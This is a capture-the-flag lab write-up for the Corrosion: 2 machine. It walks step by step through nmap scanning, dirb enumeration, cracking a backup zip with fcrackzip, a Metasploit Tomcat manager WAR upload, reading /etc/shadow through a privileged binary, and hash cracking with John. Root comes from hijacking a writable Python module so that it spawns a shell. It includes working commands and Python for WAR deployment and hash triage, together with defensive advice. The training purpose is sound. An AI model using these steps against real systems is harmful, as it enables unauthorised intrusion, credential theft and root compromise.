Lab - Corrosion 2

1. The document outlines penetration testing methodology including network scanning with tools like netdiscover and nmap, directory enumeration with dirb, password cracking with fcrackzip, exploitation using Metasploit, and privilege escalation through python library hijacking. 2. Network scanning revealed the target IP address and open ports including SSH, HTTP, and Tomcat. Directory enumeration uncovered a backup zip file that was cracked to obtain credentials. 3. The credentials were used in a Metasploit Tomcat exploit to obtain a meterpreter shell. Files on the system including /etc/shadow were accessed to crack the hash of another user.

Uploaded by

natkths

LAB: Corrosion: 2

Pentest Methodology
• Network Scanning
  • netdiscover
  • nmap
• Enumeration
  • dirb
  • fcrackzip (crack the password-protected zip file)
• Exploitation
  • Metasploit
  • /etc/shadow
  • john
• Privilege Escalation
  • ssh
  • python library hijacking
  • root flag

Network Scanning
To begin, we use netdiscover to find the target machine's IP address on the lab network.
# sudo netdiscover -r 192.168.10.0/24
The victim's IP address in this case is 192.168.10.131. (The screenshots in this write-up come from more than one lab session: some later commands address the same machine as 192.168.1.186. Substitute whatever address you discover.)

Network Scanning
Tip: a quick host-discovery sweep with nmap. -sP is the old name for -sn (ping scan, no port scan); both still work.
# nmap -sP 192.168.10.0/24

Network Scanning
Next we use nmap to find out which services are listening on the target. A version scan (-sV) lists the open ports and identifies what is running on each.
# nmap -sV 192.168.1.186
According to the nmap output, we have:
• An SSH server on port 22.
• An HTTP service (Apache) on port 80.
• A Tomcat server on port 8080.
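The scan above is typed by hand, but the same information is easy to pull out of nmap's grepable output (-oG) when you sweep a whole subnet. The following Python is an added example and not part of the original lab: it parses a constructed sample of -oG output into per-host port lists. The sample mirrors the lab's three open ports, but its version strings are placeholders, not fingerprints of the real target.

```python
import re
from collections import defaultdict

# Constructed sample of `nmap -sV -oG -` output; port numbers mirror the lab,
# the version strings are placeholders (not fingerprints of the real target).
SAMPLE_GNMAP = (
    "# Nmap 7.91 scan initiated as: nmap -sV -oG - 192.168.10.131\n"
    "Host: 192.168.10.131 ()\tStatus: Up\n"
    "Host: 192.168.10.131 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.2p1/, "
    "80/open/tcp//http//Apache httpd 2.4/, 8080/open/tcp//http//Apache Tomcat/, "
    "443/closed/tcp//https///\tIgnored State: closed (996)\n"
    "# Nmap done\n"
)

# One port entry in -oG form: port/state/protocol/owner/service/rpc-info/version/
PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)/[^/]*/([^/]*)/[^/]*/([^/]*)/")


def parse_gnmap(text):
    """Map host -> list of (port, state, proto, service, version) from 'Ports:' lines."""
    hosts = defaultdict(list)
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        # The Ports: field ends at the next tab (e.g. before "Ignored State:").
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for m in PORT_RE.finditer(ports_field):
            port, state, proto, service, version = m.groups()
            hosts[host].append((int(port), state, proto, service, version.strip()))
    return dict(hosts)


def open_services(text):
    """Only the open ports: host -> {port: service}."""
    return {
        host: {port: svc for port, state, _proto, svc, _ver in entries if state == "open"}
        for host, entries in parse_gnmap(text).items()
    }
```

Run the real scan with `nmap -sV -oG scan.gnmap 192.168.10.0/24` and pass the file's contents to `open_services`; the closed 443 entry in the sample shows why the state field is filtered rather than trusting every port that appears.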

Enumeration
Let's begin with the HTTP service on port 80. There is nothing unusual there; it is just the default Apache page.

Enumeration
Next we look at the Tomcat server listening on port 8080. It is the default Tomcat page, with nothing suspicious on it.

Enumeration
Neither site shows anything useful on its own, so we brute-force directory and file names with dirb, also asking for .php and .zip extensions. This turns up a backup zip file.
# dirb http://192.168.10.131:8080/ -X .php,.zip

Enumeration
We download the backup with wget and try to extract it, but it is password protected.
# wget http://192.168.1.186:8080/backup.zip
# unzip backup.zip

Enumeration
Note: decompress rockyou.txt.gz and install fcrackzip first.

sudo gzip -d /usr/share/wordlists/rockyou.txt.gz

sudo apt install fcrackzip

Enumeration
Next we crack the archive password with fcrackzip, a lightweight open-source zip password cracker, in dictionary mode (-D) with the rockyou word list (-p) and -u so that each candidate is verified by actually unzipping, which weeds out false positives. The password (@administrator_hi5) falls in seconds.
# fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.zip

With that password we unzip the backup and go through every file it contains. The interesting one is tomcat-users.xml, which defines Tomcat's user accounts and the roles they hold.
# unzip backup.zip
# cat tomcat-users.xml

Enumeration
tomcat-users.xml gives us the credentials admin / melehifokivai.

Exploitation
With Tomcat credentials in hand we move to Metasploit. The tomcat_mgr_upload module is the natural choice: it authenticates to the Tomcat manager application, uploads a WAR file containing the payload and triggers it, which gives us a meterpreter session. It only works if the account holds a manager role that permits deployment.

> use exploit/multi/http/tomcat_mgr_upload
> set rhosts 192.168.1.186
> set rport 8080
> set httpusername admin
> set httppassword melehifokivai
> exploit
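What the module does can be seen end to end in a few lines. The following Python is an added example, not the lab's own code or Metasploit's: it reads a tomcat-users.xml (a constructed sample, not the file from the backup), lists the accounts holding a role that permits deployment, builds a minimal WAR with a harmless JSP, and shows the PUT to the manager's text interface that deploys it. The manager URL, the context path and the probe JSP are assumptions for illustration.

```python
import base64
import io
import urllib.request
import xml.etree.ElementTree as ET
import zipfile

# Constructed sample in the shape of a Tomcat 9 tomcat-users.xml; this is NOT
# the file recovered from the lab's backup.zip.
SAMPLE_TOMCAT_USERS = """<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <role rolename="manager-status"/>
  <user username="admin" password="CHANGEME" roles="manager-gui,manager-script"/>
  <user username="monitor" password="CHANGEME2" roles="manager-status"/>
</tomcat-users>
"""

# manager-gui unlocks the HTML form (/manager/html), manager-script the text
# interface (/manager/text); either lets the holder deploy a WAR.
DEPLOY_ROLES = {"manager-gui", "manager-script"}


def users_with_deploy_rights(xml_text):
    """Return [(username, password, sorted_roles)] for accounts that can deploy."""
    found = []
    for elem in ET.fromstring(xml_text).iter():
        if elem.tag.split("}")[-1] != "user":          # strip the XML namespace
            continue
        roles = {r.strip() for r in elem.get("roles", "").split(",") if r.strip()}
        if roles & DEPLOY_ROLES:
            found.append((elem.get("username"), elem.get("password"), sorted(roles)))
    return found


# A harmless probe JSP: reports the OS account Tomcat runs as, which is the
# first thing to establish after a manager upload.
WHOAMI_JSP = '<%@ page contentType="text/plain" %><%= System.getProperty("user.name") %>'


def build_war(jsp_source, jsp_name="index.jsp"):
    """Pack a minimal WAR (a zip with WEB-INF/web.xml plus one JSP); returns bytes."""
    web_xml = ('<?xml version="1.0" encoding="UTF-8"?>\n'
               '<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="3.1"/>\n')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr("WEB-INF/web.xml", web_xml)
        war.writestr(jsp_name, jsp_source)
    return buf.getvalue()


def war_entries(war_bytes):
    """Sorted list of archive members, for checking what build_war produced."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        return sorted(war.namelist())


def deploy_war(manager_base, username, password, war_bytes, path="/probe"):
    """PUT the WAR through the manager text interface (requires manager-script).

    manager_base is assumed to look like "http://192.168.10.131:8080/manager".
    Returns (HTTP status, response body). This performs a network request, so it
    is not exercised offline; once deployed, the JSP answers at path + "/".
    """
    url = f"{manager_base}/text/deploy?path={path}&update=true"
    req = urllib.request.Request(url, data=war_bytes, method="PUT")
    req.add_header("Content-Type", "application/octet-stream")
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    req.add_header("Authorization", f"Basic {token}")
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.status, resp.read().decode(errors="replace")
```

Metasploit's module uploads a WAR whose JSP stages the meterpreter payload instead of this probe, but the plumbing is the same. The defensive reading is the same too: an account with manager-gui or manager-script whose password sits in a backup that the web server itself serves is a remote code execution path, so those roles belong only on accounts with unique, unexposed passwords, and the manager application should not be reachable from untrusted networks at all.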

Exploitation
From the meterpreter session we drop to a system shell, check which account we are running as, and upgrade to an interactive TTY with Python:

shell
id
python3 -c 'import pty;pty.spawn("/bin/bash")'

Exploitation
Changing to /home shows two users, jaye and randy. We switch to jaye with the same password (melehifokivai) we found in tomcat-users.xml: the Tomcat password was reused for a local account.

# cd /home
# ls
# su jaye
# ls

Exploitation
In jaye's home directory there is a copy of the look program that runs with enough privilege to read files jaye otherwise cannot. look prints the lines of a file that begin with a given string, so an empty string prints every line. Pointing it at /etc/shadow gives us the password hashes of every user on the box.

# ./look '' /etc/shadow

Exploitation
We already know jaye's password, so the target is randy. We copy randy's line from the /etc/shadow output into a file called hash and run John the Ripper against it with the rockyou word list. Within seconds it recovers the password 07051986randy.

# john --wordlist=/usr/share/wordlists/rockyou.txt hash
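Before handing a shadow dump to john it is worth a quick triage: which accounts are locked, which have no password at all, and what hash scheme (and cost) each crackable entry uses, since that decides how fast a word-list run will be. The Python below is an added example, not the lab's own code; the shadow lines it parses are constructed with fake salts and hashes and are not the lab's real entries.

```python
import re

# Constructed shadow records (fake salts/hashes); the user names follow the
# lab, the hash values do not.
SAMPLE_SHADOW = """\
root:!:18900:0:99999:7:::
daemon:*:18900:0:99999:7:::
jaye:$6$c0nstructedSalt$FAKEHASHFAKEHASHFAKEHASHFAKEHASHFAKEHASHFAKEHASHFAKEHASHFAKEHASH:18950:0:99999:7:::
randy:$6$rounds=5000$anotherFakeSalt$OTHERFAKEHASHOTHERFAKEHASHOTHERFAKEHASHOTHERFAKEHASHOTHERFAKE:18950:0:99999:7:::
legacy:$1$oldsalt1$FAKEMD5CRYPTHASH0000000:17000:0:99999:7:::
guest::18950:0:99999:7:::
"""

# crypt(3) scheme identifiers as they appear between the first two '$'.
SCHEMES = {"1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
           "5": "sha256crypt", "6": "sha512crypt", "7": "scrypt", "y": "yescrypt"}

# Scheme id plus the optional rounds= cost that sha256/sha512-crypt accept.
PREFIX_RE = re.compile(r"^\$(?P<id>[^$]+)\$(?:rounds=(?P<rounds>\d+)\$)?")


def parse_shadow(text):
    """Yield one dict per record: user, raw password field, status, scheme, rounds."""
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 9:             # shadow has nine colon-separated fields
            continue
        user, pw = fields[0], fields[1]
        rec = {"user": user, "field": pw, "scheme": None, "rounds": None}
        if pw == "":
            rec["status"] = "empty"      # no password needed: a finding on its own
        elif pw.startswith(("!", "*")):
            rec["status"] = "locked"     # nothing to crack
        else:
            m = PREFIX_RE.match(pw)
            if m:
                rec["scheme"] = SCHEMES.get(m.group("id"), "unknown($%s$)" % m.group("id"))
                rec["rounds"] = int(m.group("rounds")) if m.group("rounds") else None
                rec["status"] = "crackable"
            else:
                rec["status"] = "unrecognised"
        yield rec


def john_input(text, users=None):
    """'user:hash' lines for john's wordlist mode, optionally restricted to some users."""
    return [f"{r['user']}:{r['field']}" for r in parse_shadow(text)
            if r["status"] == "crackable" and (users is None or r["user"] in users)]


def triage(text):
    """Group user names by status, e.g. {"crackable": [...], "locked": [...], "empty": [...]}."""
    out = {}
    for r in parse_shadow(text):
        out.setdefault(r["status"], []).append(r["user"])
    return out
```

Writing `john_input(dump, users={"randy"})` to the file called hash reproduces the lab's step without copying by hand. A $6$ hash at the default 5000 rounds is cheap enough that a rockyou run finishes quickly, which matches what the lab saw; the same triage would also surface an empty password field, which needs no cracking at all.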

Privilege Escalation
We now have what we need for privilege escalation. We log in over ssh as randy with the cracked password 07051986randy.
# ssh randy@<target IP>

sudo -l shows what randy may run as root: the Python 3.8 interpreter on the script /home/randy/randombase64.py. The script imports the standard base64 module, and that is the opening for Python library hijacking: if we control the module that gets imported, our code runs as root.

# sudo -l
# cat /home/randy/randombase64.py

Privilege Escalation
We use locate to find where the base64 module lives and check its permissions with ls -la. The file is writable by our user, so we can modify it and use it to gain root.

# locate base64
# ls -la /usr/lib/python3.8/base64.py

Privilege Escalation
We edit base64.py with nano and add the following lines at the top of the file, so they execute as soon as the module is imported:

import os
os.system("/bin/bash")

Privilege Escalation
Now the two Python files work together: running the sudo-permitted script as root imports our modified base64 module, which spawns a root shell. From there we change to /root and read the flag.

# sudo /usr/bin/python3.8 /home/randy/randombase64.py
# cd /root
# cat root.txt
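The condition this escalation depends on is simple to state and simple to test: Python resolves `import base64` by walking sys.path in order, starting with the directory of the script being run, and if the user named in the sudo rule can write to the module file that is found, or to any directory searched before it, that user controls code that runs as root. The Python below is an added example, not the lab's own code. Run as the sudo-capable user, it reports which of those locations are writable; the temporary layout it builds for its own demonstration is constructed (a stand-in base64.py, not the system file).

```python
import os
import sys
import tempfile


def audit_import_path(module_names, script_path=None, search_path=None):
    """For each module name, find the file Python would import and report what the
    current user can write: the file itself, or any directory searched before it.

    search_path defaults to sys.path. When script_path is given, its directory is
    checked first, because `python3 script.py` puts that directory at sys.path[0].
    Returns {name: {"resolved": path_or_None, "writable_dirs": [...], "writable_file": bool}}.
    """
    entries = list(sys.path if search_path is None else search_path)
    if script_path:
        entries.insert(0, os.path.dirname(os.path.abspath(script_path)))
    report = {}
    for name in module_names:
        resolved, writable_dirs = None, []
        for entry in entries:
            if not entry or not os.path.isdir(entry):   # skip '' and zip/egg entries
                continue
            if os.access(entry, os.W_OK):               # a shadowing module could be dropped here
                writable_dirs.append(entry)
            for candidate in (os.path.join(entry, name + ".py"),
                              os.path.join(entry, name, "__init__.py")):
                if os.path.isfile(candidate):
                    resolved = candidate
                    break
            if resolved:
                break                                   # later directories can no longer shadow it
        report[name] = {
            "resolved": resolved,
            "writable_dirs": writable_dirs,
            "writable_file": bool(resolved) and os.access(resolved, os.W_OK),
        }
    return report


def is_hijackable(entry):
    """True if the module file, or a directory searched before it, is writable."""
    return entry["writable_file"] or bool(entry["writable_dirs"])


def make_demo_layout():
    """Constructed stand-in for the lab: a 'lib' dir holding a world-writable
    base64.py and a 'home' dir with a script that imports it. Returns
    (script_path, [lib_dir]). Nothing here touches the real system files.
    """
    root = tempfile.mkdtemp(prefix="pylibhijack_")
    lib = os.path.join(root, "lib")
    home = os.path.join(root, "home")
    os.makedirs(lib)
    os.makedirs(home)
    module = os.path.join(lib, "base64.py")
    with open(module, "w") as f:
        f.write("# stand-in for /usr/lib/python3.8/base64.py\n")
    os.chmod(module, 0o666)        # the misconfiguration from the lab: anyone can edit it
    script = os.path.join(home, "randombase64.py")
    with open(script, "w") as f:
        f.write("import base64\nprint(base64.__file__)\n")
    return script, [lib]


if __name__ == "__main__":
    demo_script, demo_libs = make_demo_layout()
    for mod, info in audit_import_path(["base64"], script_path=demo_script, search_path=demo_libs).items():
        print(mod, "HIJACKABLE" if is_hijackable(info) else "ok", info)
```

Against the real box you would run `audit_import_path(["base64"], script_path="/home/randy/randombase64.py")` as randy. Note that the report flags the script's own directory as well as the writable library file: /home/randy is owned by randy and is searched first, so a sudo rule on a script in a user-owned directory is hijackable even if every library file is read-only. The fix is a root-owned script in a root-owned directory, library files and directories writable only by root, and no sudo rule on an interpreter or script whose imports the user can influence.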
